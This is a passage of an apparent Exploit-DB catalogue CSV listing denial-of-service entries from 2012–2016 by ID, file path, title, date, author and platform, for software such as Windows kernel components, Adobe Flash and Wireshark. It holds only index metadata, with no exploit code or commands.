Overflow",2015-09-14,hyp3rlinx,dos,windows, +38205,exploits/multiple/dos/38205.py,"BT Home Hub - 'uuid' Buffer Overflow",2013-01-08,"Zachary Cutlip",dos,multiple, +38208,exploits/multiple/dos/38208.py,"Colloquy - Remote Denial of Service",2013-01-09,Aph3x,dos,multiple, +38214,exploits/windows/dos/38214.txt,"Microsoft Excel 2007/2010/2013 - BIFFRecord Use-After-Free",2015-09-16,"Google Security Research",dos,windows, +38215,exploits/windows/dos/38215.txt,"Microsoft Office 2007 - BIFFRecord Length Use-After-Free",2015-09-16,"Google Security Research",dos,windows, +38216,exploits/windows/dos/38216.txt,"Microsoft Office 2007 - OLESSDirectyEntry.CreateTime Type Confusion",2015-09-16,"Google Security Research",dos,windows, +38217,exploits/windows/dos/38217.txt,"Microsoft Office 2007 - 'OGL.dll' ValidateBitmapInfo Bounds Check Failure (MS15-097)",2015-09-16,"Google Security Research",dos,windows, +38225,exploits/windows/dos/38225.txt,"VBox Satellite Express 2.3.17.3 - Arbitrary Write",2015-09-17,KoreLogic,dos,windows, +38240,exploits/windows/dos/38240.py,"Wireshark 1.12.7 - Division by Zero Crash (PoC)",2015-09-18,spyk,dos,windows, +38249,exploits/multiple/dos/38249.txt,"MiniUPnP 1.4 - Multiple Denial of Service Vulnerabilities",2012-01-28,Rapid7,dos,multiple, +38259,exploits/windows/dos/38259.py,"MASM32 11R - Crash (PoC)",2015-09-22,VIKRAMADITYA,dos,windows, +38262,exploits/osx/dos/38262.txt,"Apple Mac OSX Regex Engine (TRE) - Integer Signedness / Overflow",2015-09-22,"Google Security Research",dos,osx, +38263,exploits/osx/dos/38263.txt,"Apple Mac OSX Regex Engine (TRE) - Stack Buffer Overflow",2015-09-22,"Google Security Research",dos,osx, +38264,exploits/osx/dos/38264.txt,"Apple qlmanage - SceneKit::daeElement::setElementName Heap Overflow",2015-09-22,"Google Security Research",dos,osx, +38265,exploits/win_x86/dos/38265.txt,"Microsoft Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (2)",2015-09-22,"Nils Sommer",dos,win_x86, +38266,exploits/win_x86/dos/38266.txt,"Microsoft Windows Kernel - 'DeferWindowPos' Use-After-Free (MS15-073)",2015-09-22,"Nils Sommer",dos,win_x86, +38267,exploits/win_x86/dos/38267.txt,"Microsoft Windows Kernel - 'UserCommitDesktopMemory' Use-After-Free (MS15-073)",2015-09-22,"Nils Sommer",dos,win_x86, +38268,exploits/win_x86/dos/38268.txt,"Microsoft Windows Kernel - Pool Buffer Overflow Drawing Caption Bar (MS15-061)",2015-09-22,"Nils Sommer",dos,win_x86, +38269,exploits/win_x86/dos/38269.txt,"Microsoft Windows Kernel - 'HmgAllocateObjectAttr' Use-After-Free (MS15-061)",2015-09-22,"Nils Sommer",dos,win_x86, +38270,exploits/win_x86/dos/38270.txt,"Microsoft Windows Kernel - 'win32k!vSolidFillRect' Buffer Overflow (MS15-061)",2015-09-22,"Nils Sommer",dos,win_x86, +38271,exploits/win_x86/dos/38271.txt,"Microsoft Windows Kernel - 'SURFOBJ' Null Pointer Dereference (MS15-061)",2015-09-22,"Nils Sommer",dos,win_x86, +38272,exploits/windows/dos/38272.txt,"Microsoft Windows Kernel - Brush Object Use-After-Free (MS15-061)",2015-09-22,"Google Security Research",dos,windows, +38273,exploits/win_x86/dos/38273.txt,"Microsoft Windows Kernel - WindowStation Use-After-Free (MS15-061)",2015-09-22,"Nils Sommer",dos,win_x86, +38274,exploits/win_x86/dos/38274.txt,"Microsoft Windows Kernel - Null Pointer Dereference with Window Station and Clipboard (MS15-061)",2015-09-22,"Nils Sommer",dos,win_x86, +38275,exploits/win_x86/dos/38275.txt,"Microsoft Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (1)",2015-09-22,"Nils Sommer",dos,win_x86, +38276,exploits/win_x86/dos/38276.txt,"Microsoft Windows Kernel - 'FlashWindowEx​' Memory Corruption (MS15-097)",2015-09-22,"Nils Sommer",dos,win_x86, +38277,exploits/win_x86/dos/38277.txt,"Microsoft Windows Kernel - 'bGetRealizedBrush' Use-After-Free (MS15-097)",2015-09-22,"Nils Sommer",dos,win_x86, +38278,exploits/win_x86/dos/38278.txt,"Microsoft Windows Kernel - Use-After-Free with Cursor Object (MS15-097)",2015-09-22,"Nils Sommer",dos,win_x86, +38279,exploits/win_x86/dos/38279.txt,"Microsoft Windows Kernel - Use-After-Free with Printer Device Contexts (MS15-097)",2015-09-22,"Nils Sommer",dos,win_x86, +38280,exploits/win_x86/dos/38280.txt,"Microsoft Windows Kernel - 'NtGdiStretchBlt' Pool Buffer Overflow (MS15-097)",2015-09-22,"Nils Sommer",dos,win_x86, +38281,exploits/windows/dos/38281.txt,"Kaspersky AntiVirus - VB6 Parsing Integer Overflow",2015-09-22,"Google Security Research",dos,windows, +38282,exploits/windows/dos/38282.txt,"Kaspersky AntiVirus - ExeCryptor Parsing Memory Corruption",2015-09-22,"Google Security Research",dos,windows, +38283,exploits/windows/dos/38283.txt,"Kaspersky AntiVirus - PE Unpacking Integer Overflow",2015-09-22,"Google Security Research",dos,windows, +38284,exploits/windows/dos/38284.txt,"Kaspersky AntiVirus - '.DEX' File Format Parsing Memory Corruption",2015-09-22,"Google Security Research",dos,windows, +38285,exploits/windows/dos/38285.txt,"Kaspersky AntiVirus - CHM Parsing Stack Buffer Overflow",2015-09-22,"Google Security Research",dos,windows, +38286,exploits/windows/dos/38286.txt,"Kaspersky AntiVirus - UPX Parsing Memory Corruption",2015-09-22,"Google Security Research",dos,windows, +38288,exploits/windows/dos/38288.txt,"Kaspersky AntiVirus - Yoda's Protector Unpacking Memory Corruption",2015-09-22,"Google Security Research",dos,windows, +38307,exploits/win_x86/dos/38307.txt,"Microsoft Windows Kernel - 'NtGdiBitBlt' Buffer Overflow (MS15-097)",2015-09-24,"Nils Sommer",dos,win_x86, +38317,exploits/windows/dos/38317.txt,"FreshFTP 5.52 - '.qfl' Crash (PoC)",2015-09-25,Un_N0n,dos,windows, +38336,exploits/windows/dos/38336.py,"Git 1.9.5 - 'ssh-agent.exe' Buffer Overflow",2015-09-28,hyp3rlinx,dos,windows, +38337,exploits/ios/dos/38337.txt,"Telegram 3.2 - Input Length Handling Crash (PoC)",2015-09-28,"Mohammad Reza Espargham",dos,ios, +38344,exploits/windows/dos/38344.txt,"Adobe Acrobat Reader - AFParseDate JavaScript API Restrictions Bypass",2015-09-28,"Reigning Shells",dos,windows, +38348,exploits/windows/dos/38348.txt,"Adobe Flash - 'uint' Capacity Field",2015-09-28,"Google Security Research",dos,windows, +38364,exploits/multiple/dos/38364.txt,"Varnish Cache - Multiple Denial of Service Vulnerabilities",2013-03-05,tytusromekiatomek,dos,multiple, +38365,exploits/linux/dos/38365.txt,"Squid - 'httpMakeVaryMark()' Remote Denial of Service",2013-03-05,tytusromekiatomek,dos,linux, +38392,exploits/linux/dos/38392.txt,"MySQL / MariaDB - Geometry Query Denial of Service",2013-03-07,"Alyssa Milburn",dos,linux, +38399,exploits/windows/dos/38399.py,"LanSpy 2.0.0.155 - Buffer Overflow",2015-10-05,hyp3rlinx,dos,windows, +38404,exploits/windows/dos/38404.py,"LanWhoIs.exe 1.0.1.120 - Stack Buffer Overflow",2015-10-06,hyp3rlinx,dos,windows, +38405,exploits/windows/dos/38405.py,"Last PassBroker 3.2.16 - Stack Based Buffer Overflow",2015-10-06,Un_N0n,dos,windows, +38419,exploits/windows/dos/38419.txt,"SmallFTPd - Denial of Service",2013-04-03,AkaStep,dos,windows, +38420,exploits/multiple/dos/38420.txt,"Google Chrome - Cookie Verification Denial of Service",2013-04-04,anonymous,dos,multiple, +38421,exploits/linux/dos/38421.txt,"Apache Subversion 1.6.x - 'mod_dav_svn/lock.c' Remote Denial of Service",2013-04-05,anonymous,dos,linux, +38422,exploits/linux/dos/38422.txt,"Apache Subversion - Remote Denial of Service",2013-04-05,"Greg McMullin",dos,linux, +38442,exploits/php/dos/38442.txt,"PHPMyLicense 3.0.0 < 3.1.4 - Denial of Service",2015-10-11,"Aria Akhavan Rezayat",dos,php, +38444,exploits/win_x86/dos/38444.py,"Tomabo MP4 Converter 3.10.12 < 3.11.12 - '.m3u' File Crush Application (Denial of Service)",2015-10-11,"mohammed Mohammed",dos,win_x86, +38475,exploits/hardware/dos/38475.txt,"ZHONE < S3.0.501 - Multiple Remote Code Execution Vulnerabilities",2015-10-16,"Lyon Yang",dos,hardware, +38465,exploits/linux/dos/38465.txt,"Linux Kernel 3.2.1 - Tracing Multiple Local Denial of Service Vulnerabilities",2013-04-15,anonymous,dos,linux, +38483,exploits/hardware/dos/38483.txt,"TP-Link TL-WR741N / TL-WR741ND Routers - Multiple Denial of Service Vulnerabilities",2013-04-19,W1ckerMan,dos,hardware, +38485,exploits/windows/dos/38485.py,"VideoLAN VLC Media Player 2.2.1 - libvlccore '.mp3' Stack Overflow",2015-10-18,"Andrea Sindoni",dos,windows, +38490,exploits/multiple/dos/38490.txt,"Adobe Flash - 'IExternalizable.writeExternal' Type Confusion",2015-10-19,"Google Security Research",dos,multiple, +38493,exploits/hardware/dos/38493.txt,"Cisco Linksys WRT310N Router - Multiple Denial of Service Vulnerabilities",2013-04-23,"Carl Benedict",dos,hardware, +38498,exploits/windows/dos/38498.py,"Elecard MPEG Player - '.m3u' File Buffer Overflow",2013-04-27,metacom,dos,windows, +38538,exploits/multiple/dos/38538.py,"Code::Blocks - Denial of Service",2013-05-29,ariarat,dos,multiple, +38555,exploits/android/dos/38555.txt,"Samsung - 'm2m1shot' Kernel Driver Buffer Overflow",2015-10-28,"Google Security Research",dos,android, +38556,exploits/android/dos/38556.txt,"Samsung - 'seiren' Kernel Driver Buffer Overflow",2015-10-28,"Google Security Research",dos,android, +38557,exploits/android/dos/38557.txt,"Samsung fimg2d - FIMG2D_BITBLT_BLIT ioctl Concurrency Flaw",2015-10-28,"Google Security Research",dos,android, +38558,exploits/android/dos/38558.txt,"Samsung - SecEmailComposer QUICK_REPLY_BACKGROUND Permissions",2015-10-28,"Google Security Research",dos,android, +38564,exploits/windows/dos/38564.py,"Sam Spade 1.14 - Scan From IP Address Field Overflow Crash (SEH) (PoC)",2015-10-29,"Luis Martínez",dos,windows, +38566,exploits/hardware/dos/38566.py,"NetUSB - Kernel Stack Buffer Overflow",2015-10-29,"Adrián Ruiz Bermudo",dos,hardware, +38580,exploits/windows/dos/38580.txt,"Microsoft Windows - NtCreateLowBoxToken Handle Capture Local Denial of Service / Privilege Escalation (MS15-111)",2015-10-30,"Google Security Research",dos,windows, +38589,exploits/linux/dos/38589.c,"Linux Kernel 3.0.5 - 'test_root()' Local Denial of Service",2013-06-05,"Jonathan Salwan",dos,linux, +38595,exploits/multiple/dos/38595.txt,"Oracle VM VirtualBox 4.0 - 'tracepath' Local Denial of Service",2013-06-26,"Thomas Dreibholz",dos,multiple, +38610,exploits/android/dos/38610.txt,"Samsung Galaxy S6 Samsung Gallery - GIF Parsing Crash",2015-11-03,"Google Security Research",dos,android, +38611,exploits/android/dos/38611.txt,"Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption",2015-11-03,"Google Security Research",dos,android, +38612,exploits/android/dos/38612.txt,"Samsung Galaxy S6 - libQjpeg DoIntegralUpsample Crash",2015-11-03,"Google Security Research",dos,android, +38613,exploits/android/dos/38613.txt,"Samsung Galaxy S6 Samsung Gallery - Bitmap Decoding Crash",2015-11-03,"Google Security Research",dos,android, +38614,exploits/android/dos/38614.txt,"Samsung - libQjpeg Image Decoding Memory Corruption",2015-11-03,"Google Security Research",dos,android, +38615,exploits/windows/dos/38615.txt,"Python 2.7 hotshot Module - 'pack_string' Heap Buffer Overflow",2015-11-03,"John Leitch",dos,windows, +38616,exploits/multiple/dos/38616.txt,"Python 2.7 - 'array.fromstring' Method Use-After-Free",2015-11-03,"John Leitch",dos,multiple, +38617,exploits/windows/dos/38617.txt,"Python 2.7 - 'strop.replace()' Method Integer Overflow",2015-11-03,"John Leitch",dos,windows, +38618,exploits/windows/dos/38618.txt,"Python 3.3 < 3.5 - 'product_setstate()' Out-of-Bounds Read",2015-11-03,"John Leitch",dos,windows, +38620,exploits/linux/dos/38620.txt,"FreeType 2.6.1 - TrueType tt_cmap14_validate Parsing Heap Based Out-of-Bounds Reads",2015-11-04,"Google Security Research",dos,linux, +38622,exploits/linux/dos/38622.txt,"libvirt - 'virConnectListAllInterfaces' Method Denial of Service",2013-07-01,"Daniel P. Berrange",dos,linux, +38623,exploits/multiple/dos/38623.html,"RealNetworks RealPlayer - Denial of Service",2013-07-02,"Akshaysinh Vaghela",dos,multiple, +38626,exploits/multiple/dos/38626.py,"FileCOPA FTP Server - Remote Denial of Service",2013-07-01,Chako,dos,multiple, +38650,exploits/windows/dos/38650.py,"QNap QVR Client 5.1.0.11290 - Crash (PoC)",2015-11-07,"Luis Martínez",dos,windows, +39374,exploits/osx/dos/39374.c,"Apple Mac OSX Kernel - IOAccelMemoryInfoUserClient Use-After-Free",2016-01-28,"Google Security Research",dos,osx, +38659,exploits/windows/dos/38659.py,"POP Peeper 4.0.1 - Overwrite (SEH)",2015-11-09,Un_N0n,dos,windows, +38662,exploits/multiple/dos/38662.txt,"FreeType 2.6.1 - TrueType tt_sbit_decoder_load_bit_aligned Heap Based Out-of-Bounds Read",2015-11-09,"Google Security Research",dos,multiple, +38681,exploits/linux/dos/38681.py,"FBZX 2.10 - Local Stack Based Buffer Overflow",2015-11-11,"Juan Sacco",dos,linux, +38685,exploits/linux/dos/38685.py,"TACK 1.07 - Local Stack Based Buffer Overflow",2015-11-12,"Juan Sacco",dos,linux, +38687,exploits/windows/dos/38687.py,"Sam Spade 1.14 - S-Lang Command Field Overflow (SEH)",2015-11-12,"Nipun Jaswal",dos,windows, +38701,exploits/windows/dos/38701.txt,"TECO SG2 FBD Client 3.51 - '.gfb' Overwrite Buffer Overflow (SEH)",2015-11-16,LiquidWorm,dos,windows, +38702,exploits/windows/dos/38702.txt,"TECO TP3-PCLINK 2.1 - '.tpc' File Handling Buffer Overflow",2015-11-16,LiquidWorm,dos,windows, +38703,exploits/windows/dos/38703.txt,"TECO AP-PCLINK 1.094 - '.tpc' File Handling Buffer Overflow",2015-11-16,LiquidWorm,dos,windows, +38705,exploits/windows/dos/38705.py,"Sam Spade 1.14 - Browse URL Buffer Overflow (PoC)",2015-11-16,"Nipun Jaswal",dos,windows, +38710,exploits/windows/dos/38710.py,"foobar2000 1.3.9 - '.pls' / '.m3u' / '.m3u8' Local Crash (PoC)",2015-11-16,"Antonio Z.",dos,windows, +38711,exploits/windows/dos/38711.py,"foobar2000 1.3.9 - '.asx' Local Crash (PoC)",2015-11-16,"Antonio Z.",dos,windows, +38713,exploits/windows/dos/38713.txt,"Microsoft Windows Kernel - 'win32k.sys' Malformed TrueType Program TTF Font Processing Pool-Based Buffer Overflow (MS15-115)",2015-11-16,"Google Security Research",dos,windows, +38714,exploits/windows/dos/38714.txt,"Microsoft Windows Kernel - 'win32k.sys' Malformed OS/2 Table TTF Font Processing Pool-Based Buffer Overflow (MS15-115)",2015-11-16,"Google Security Research",dos,windows, +38734,exploits/windows/dos/38734.txt,"Kaspersky AntiVirus - Certificate Handling Directory Traversal",2015-11-16,"Google Security Research",dos,windows, +38735,exploits/windows/dos/38735.txt,"Kaspersky AntiVirus - '.DEX' File Format Memory Corruption",2015-11-16,"Google Security Research",dos,windows, +38736,exploits/windows/dos/38736.txt,"Kaspersky AntiVirus - '.ZIP' File Format Use-After-Free",2015-11-16,"Google Security Research",dos,windows, +38747,exploits/windows/dos/38747.py,"Pwstore - Denial of Service",2013-04-16,"Josep Pi Rodriguez",dos,windows, +38758,exploits/windows/dos/38758.py,"SuperScan 4.1 - Scan Hostname/IP Field Buffer Overflow",2015-11-19,"Luis Martínez",dos,windows, +38759,exploits/windows/dos/38759.py,"SuperScan 4.1 - Tools Hostname/IP/URL Field Buffer Overflow",2015-11-19,"Luis Martínez",dos,windows, +38760,exploits/windows/dos/38760.py,"SuperScan 4.1 - Windows Enumeration Hostname/IP/URL Field Overflow (SEH)",2015-11-19,"Luis Martínez",dos,windows, +38761,exploits/windows/dos/38761.py,"Sam Spade 1.14 - Decode URL Buffer Overflow Crash (PoC)",2015-11-19,"Vivek Mahajan",dos,windows, +38763,exploits/lin_x86/dos/38763.txt,"Google Chrome - open-vcdiff Out-of-Bounds Read in Browser Process Integer Overflow",2015-11-19,"Google Security Research",dos,lin_x86, +38771,exploits/windows/dos/38771.py,"ShareKM - Remote Denial of Service",2013-09-22,"Yuda Prawira",dos,windows, +38778,exploits/linux/dos/38778.txt,"Blue Coat ProxySG 5.x and Security Gateway OS - Denial of Service",2013-09-23,anonymous,dos,linux, +38779,exploits/multiple/dos/38779.py,"Abuse HTTP Server - Remote Denial of Service",2013-09-30,"Zico Ekel",dos,multiple, +38787,exploits/windows/dos/38787.txt,"Acrobat Reader DC 15.008.20082.15957 - '.PDF' Parsing Memory Corruption",2015-11-23,"Francis Provencher",dos,windows, +38788,exploits/windows/dos/38788.txt,"Oracle Outside In PDF 8.5.2 - Parsing Memory Corruption (1)",2015-11-23,"Francis Provencher",dos,windows, +38789,exploits/windows/dos/38789.txt,"Oracle Outside In PDF 8.5.2 - Parsing Memory Corruption (2)",2015-11-23,"Francis Provencher",dos,windows, +38791,exploits/windows/dos/38791.rb,"Audacious 3.7 - ID3 Local Crash (PoC)",2015-11-23,"Antonio Z.",dos,windows, +38793,exploits/windows/dos/38793.txt,"Microsoft Windows - 'ndis.sys' IOCTL 0x170034 (ndis!ndisNsiGetIfNameForIfIndex) Pool Buffer Overflow (MS15-117)",2015-11-23,"Nils Sommer",dos,windows, +38794,exploits/windows/dos/38794.txt,"Microsoft Windows - Cursor Object Memory Leak (MS15-115)",2015-11-23,"Nils Sommer",dos,windows, +38795,exploits/windows/dos/38795.txt,"Microsoft Windows - Race Condition DestroySMWP Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",dos,windows, +38796,exploits/windows/dos/38796.txt,"Microsoft Windows Kernel - Device Contexts and NtGdiSelectBitmap Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",dos,windows, +38798,exploits/multiple/dos/38798.txt,"Mozilla Firefox - Cookie Verification Denial of Service",2013-04-04,anonymous,dos,multiple, +38854,exploits/linux/dos/38854.sh,"Net-SNMP - SNMPD AgentX Subagent Timeout Denial of Service",2012-09-05,"Ken Farnen",dos,linux, +38857,exploits/linux/dos/38857.txt,"Gnome Nautilus 3.16 - Denial of Service",2015-12-03,"Panagiotis Vagenas",dos,linux, +38858,exploits/windows/dos/38858.txt,"Malwarebytes AntiVirus 2.2.0 - Denial of Service (PoC)",2015-12-03,"Francis Provencher",dos,windows, +38878,exploits/windows/dos/38878.txt,"WinAsm Studio 5.1.8.8 - Buffer Overflow Crash (PoC)",2015-12-06,Un_N0n,dos,windows, +38909,exploits/linux/dos/38909.txt,"DenyHosts - 'regex.py' Remote Denial of Service",2013-12-19,"Helmut Grohne",dos,linux, +38916,exploits/windows/dos/38916.html,"Microsoft Internet Explorer 11.0.9600.18097 - COmWindowProxy::SwitchMarkup NULL PTR",2015-12-09,"Marcin Ressel",dos,windows, +38917,exploits/osx/dos/38917.txt,"Apple Mac OSX 10.11 - FTS Deep Structure of the FileSystem Buffer Overflow",2015-12-09,"Maksymilian Arciemowicz",dos,osx, +38930,exploits/multiple/dos/38930.txt,"Rar - CmdExtract::UnstoreFile Integer Truncation Memory Corruption",2015-12-10,"Google Security Research",dos,multiple, +38931,exploits/multiple/dos/38931.txt,"Avast! - Out-of-Bounds Write Decrypting PEncrypt Packed executables",2015-12-10,"Google Security Research",dos,multiple, +38932,exploits/multiple/dos/38932.txt,"Avast! - JetDb::Ised4x Performs Unbounded Search on Input",2015-12-10,"Google Security Research",dos,multiple, +38933,exploits/multiple/dos/38933.txt,"Avast! - Heap Overflow Unpacking MoleBox Archives",2015-12-10,"Google Security Research",dos,multiple, +38934,exploits/windows/dos/38934.txt,"Avast! - Integer Overflow Verifying numFonts in TTC Header",2015-12-10,"Google Security Research",dos,windows, +38939,exploits/multiple/dos/38939.c,"VideoLAN VLC Media Player 1.1.11 - '.NSV' File Denial of Service",2012-03-14,"Dan Fosco",dos,multiple, +38940,exploits/multiple/dos/38940.c,"VideoLAN VLC Media Player 1.1.11 - '.EAC3' File Denial of Service",2012-03-14,"Dan Fosco",dos,multiple, +39095,exploits/php/dos/39095.pl,"MyBB 1.6.12 - 'misc.php' Remote Denial of Service",2014-02-12,Amir,dos,php, +38969,exploits/multiple/dos/38969.txt,"Adobe Flash - Type Confusion in IExternalizable.readExternal When Performing Local Serialization",2015-12-14,"Google Security Research",dos,multiple, +38970,exploits/multiple/dos/38970.txt,"Adobe Flash - Type Confusion in Serialization with ObjectEncoder.dynamicPropertyWriter",2015-12-14,"Google Security Research",dos,multiple, +38972,exploits/windows/dos/38972.html,"Microsoft Internet Explorer 11 - MSHTML!CObjectElement Use-After-Free (MS15-124)",2015-12-14,"Moritz Jodeit",dos,windows, +38978,exploits/windows/dos/38978.py,"IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - Invalid Pointer Dereference",2015-12-15,"Ptrace Security",dos,windows,11460 +38979,exploits/windows/dos/38979.py,"IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - _FXCLI_SetConfFileChunk Stack Buffer Overflow",2015-12-15,"Ptrace Security",dos,windows,11460 +38980,exploits/windows/dos/38980.py,"IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - _FXCLI_GetConfFileChunk Stack Buffer Overflow",2015-12-15,"Ptrace Security",dos,windows,11460 +38992,exploits/multiple/dos/38992.txt,"Wireshark - iseries_parse_packet Heap Based Buffer Overflow",2015-12-16,"Google Security Research",dos,multiple, +38993,exploits/multiple/dos/38993.txt,"Wireshark - dissect_tds7_colmetadata_token Stack Based Buffer Overflow",2015-12-16,"Google Security Research",dos,multiple, +38994,exploits/multiple/dos/38994.txt,"Wireshark - wmem_alloc Assertion Failure",2015-12-16,"Google Security Research",dos,multiple, +38995,exploits/multiple/dos/38995.txt,"Wireshark - dissect_zcl_pwr_prof_pwrprofstatersp Static Out-of-Bounds Read",2015-12-16,"Google Security Research",dos,multiple, +38996,exploits/multiple/dos/38996.txt,"Wireshark - dissct_rsl_ipaccess_msg Static Out-of-Bounds Read",2015-12-16,"Google Security Research",dos,multiple, +38997,exploits/multiple/dos/38997.txt,"Wireshark - file_read 'wtap_read_bytes_or_eof/mp2t_find_next_pcr' Stack Based Buffer Overflow",2015-12-16,"Google Security Research",dos,multiple, +38998,exploits/multiple/dos/38998.txt,"Wireshark - memcpy 'get_value / dissect_btatt' SIGSEGV",2015-12-16,"Google Security Research",dos,multiple, +38999,exploits/multiple/dos/38999.txt,"Wireshark - dissect_nbap_MACdPDU_Size SIGSEGV",2015-12-16,"Google Security Research",dos,multiple, +39000,exploits/multiple/dos/39000.txt,"Wireshark - my_dgt_tbcd_unpack Static Buffer Overflow",2015-12-16,"Google Security Research",dos,multiple, +39001,exploits/multiple/dos/39001.txt,"Wireshark - ascend_seek Static Out-of-Bounds Read",2015-12-16,"Google Security Research",dos,multiple, +39002,exploits/multiple/dos/39002.txt,"Wireshark - addresses_equal 'dissect_rsvp_common' Use-After-Free",2015-12-16,"Google Security Research",dos,multiple, +39003,exploits/multiple/dos/39003.txt,"Wireshark - dissect_diameter_base_framed_ipv6_prefix Stack Based Buffer Overflow",2015-12-16,"Google Security Research",dos,multiple, +39004,exploits/multiple/dos/39004.txt,"Wireshark - find_signature Stack Based Out-of-Bounds Read",2015-12-16,"Google Security Research",dos,multiple, +39005,exploits/multiple/dos/39005.txt,"Wireshark - AirPDcapPacketProcess Stack Based Buffer Overflow",2015-12-16,"Google Security Research",dos,multiple, +39006,exploits/multiple/dos/39006.txt,"Wireshark - getRate Stack Based Out-of-Bounds Read",2015-12-16,"Google Security Research",dos,multiple, +39019,exploits/windows/dos/39019.txt,"Adobe Flash TextField.antiAliasType Setter - Use-After-Free",2015-12-17,"Google Security Research",dos,windows, +39020,exploits/windows/dos/39020.txt,"Adobe Flash TextField.gridFitType Setter - Use-After-Free",2015-12-17,"Google Security Research",dos,windows, +39021,exploits/windows/dos/39021.txt,"Adobe Flash MovieClip.lineStyle - Use-After-Frees",2015-12-17,"Google Security Research",dos,windows, +39022,exploits/windows/dos/39022.txt,"Adobe Flash GradientFill - Use-After-Frees",2015-12-17,"Google Security Research",dos,windows, +40105,exploits/multiple/dos/40105.txt,"Adobe Flash Player 22.0.0.192 - TAG Memory Corruption",2016-07-13,COSIG,dos,multiple, +40104,exploits/multiple/dos/40104.txt,"Adobe Flash Player 22.0.0.192 - SceneAndFrameData Memory Corruption",2016-07-13,COSIG,dos,multiple, +39025,exploits/windows/dos/39025.txt,"Microsoft Windows Kernel - 'win32k!OffsetChildren' Null Pointer Dereference",2015-12-17,"Nils Sommer",dos,windows, +39026,exploits/win_x86/dos/39026.txt,"win32k Desktop and Clipboard - Null Pointer Dereference",2015-12-17,"Nils Sommer",dos,win_x86, +39027,exploits/win_x86/dos/39027.txt,"win32k Clipboard Bitmap - Use-After-Free",2015-12-17,"Nils Sommer",dos,win_x86, +39037,exploits/windows/dos/39037.php,"Apache 2.4.17 - Denial of Service",2015-12-18,rUnViRuS,dos,windows, +39039,exploits/multiple/dos/39039.txt,"Google Chrome - Renderer Process to Browser Process Privilege Escalation",2015-12-18,"Google Security Research",dos,multiple, +39040,exploits/windows/dos/39040.txt,"Adobe Flash MovieClip.attachBitmap - Use-After-Free",2015-12-18,"Google Security Research",dos,windows, +39041,exploits/windows/dos/39041.txt,"Adobe Flash MovieClip.startDrag - Use-After-Free",2015-12-18,"Google Security Research",dos,windows, +39042,exploits/windows/dos/39042.txt,"Adobe Flash MovieClip.duplicateMovieClip - Use-After-Free",2015-12-18,"Google Security Research",dos,windows, +39043,exploits/win_x86-64/dos/39043.txt,"Adobe Flash Selection.SetSelection - Use-After-Free",2015-12-18,"Google Security Research",dos,win_x86-64, +39044,exploits/windows/dos/39044.txt,"Adobe Flash TextField.sharpness Setter - Use-After-Free",2015-12-18,"Google Security Research",dos,windows, +39045,exploits/windows/dos/39045.txt,"Adobe Flash TextField.thickness Setter - Use-After-Free",2015-12-18,"Google Security Research",dos,windows, +39046,exploits/windows/dos/39046.txt,"Adobe Flash TextField.setFormat - Use-After-Free",2015-12-18,"Google Security Research",dos,windows, +39047,exploits/windows/dos/39047.txt,"Adobe Flash TextField.replaceSel - Use-After-Free",2015-12-18,"Google Security Research",dos,windows, +39048,exploits/windows/dos/39048.txt,"Adobe Flash TextField.replaceText - Use-After-Free",2015-12-18,"Google Security Research",dos,windows, +39049,exploits/windows/dos/39049.txt,"Adobe Flash - 'TextField' Use-After Free",2015-12-18,"Google Security Research",dos,windows, +39050,exploits/windows/dos/39050.txt,"Adobe Flash - TextField.Variable Setter Use-After-Free",2015-12-18,"Google Security Research",dos,windows, +39051,exploits/windows/dos/39051.txt,"Adobe Flash TextField.htmlText Setter - Use-After-Free",2015-12-18,"Google Security Research",dos,windows, +39052,exploits/windows/dos/39052.txt,"Adobe Flash TextField.type Setter - Use-After-Free",2015-12-18,"Google Security Research",dos,windows, +39053,exploits/windows/dos/39053.txt,"Adobe Flash TextField.text Setter - Use-After-Free",2015-12-18,"Google Security Research",dos,windows, +39054,exploits/windows/dos/39054.txt,"Adobe Flash TextField.tabIndex Setter - Use-After-Free",2015-12-18,"Google Security Research",dos,windows, +39055,exploits/windows/dos/39055.txt,"Adobe Flash MovieClip.attachMovie - Use-After-Free",2015-12-18,"Google Security Research",dos,windows, +39056,exploits/windows/dos/39056.txt,"Adobe Flash MovieClip.localToGlobal - Use-After-Free",2015-12-18,"Google Security Research",dos,windows, +39067,exploits/windows/dos/39067.py,"Notepad++ NPPFtp Plugin 0.26.3 - Buffer Overflow",2015-12-21,R-73eN,dos,windows, +39070,exploits/windows/dos/39070.txt,"Base64 Decoder 1.1.2 - Overwrite (SEH) (PoC)",2015-12-21,Un_N0n,dos,windows, +39072,exploits/win_x86-64/dos/39072.txt,"Adobe Flash Sound.setTransform - Use-After-Free",2015-12-21,"Google Security Research",dos,win_x86-64, +39073,exploits/cgi/dos/39073.txt,"Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/reboot.cgi' Unauthenticated Remote Reboot (Denial of Service)",2014-02-03,"Josue Rojas",dos,cgi, +39076,exploits/multiple/dos/39076.txt,"Wireshark - 'infer_pkt_encap' Heap Based Out-of-Bounds Read",2015-12-22,"Google Security Research",dos,multiple, +39077,exploits/multiple/dos/39077.txt,"Wireshark - 'AirPDcapDecryptWPABroadcastKey' Heap Based Out-of-Bounds Read (1)",2015-12-22,"Google Security Research",dos,multiple, +39082,exploits/multiple/dos/39082.txt,"PHP 7.0.0 - Format String",2015-12-23,"Andrew Kramer",dos,multiple, +39091,exploits/php/dos/39091.pl,"WHMCompleteSolution (WHMCS) 5.12 - 'cart.php' Denial of Service",2014-02-07,Amir,dos,php, +39092,exploits/php/dos/39092.pl,"phpBB 3.0.8 - Remote Denial of Service",2014-02-11,Amir,dos,php, +39103,exploits/windows/dos/39103.txt,"AccessDiver 4.301 - Buffer Overflow",2015-12-26,hyp3rlinx,dos,windows, +39125,exploits/windows/dos/39125.html,"Kaspersky Internet Security - Remote Denial of Service",2014-03-20,CXsecurity,dos,windows, +39144,exploits/windows/dos/39144.html,"Microsoft Internet Explorer 11.0.9600.18124 EdUtil::GetCommonAncestorElement - Denial of Service",2015-12-31,"Marcin Ressel",dos,windows, +39225,exploits/hardware/dos/39225.txt,"Apple watchOS 2 - Crash (PoC)",2016-01-12,"Mohammad Reza Espargham",dos,hardware, +39226,exploits/windows/dos/39226.py,"SNScan 1.05 - Scan Hostname/IP Field Buffer 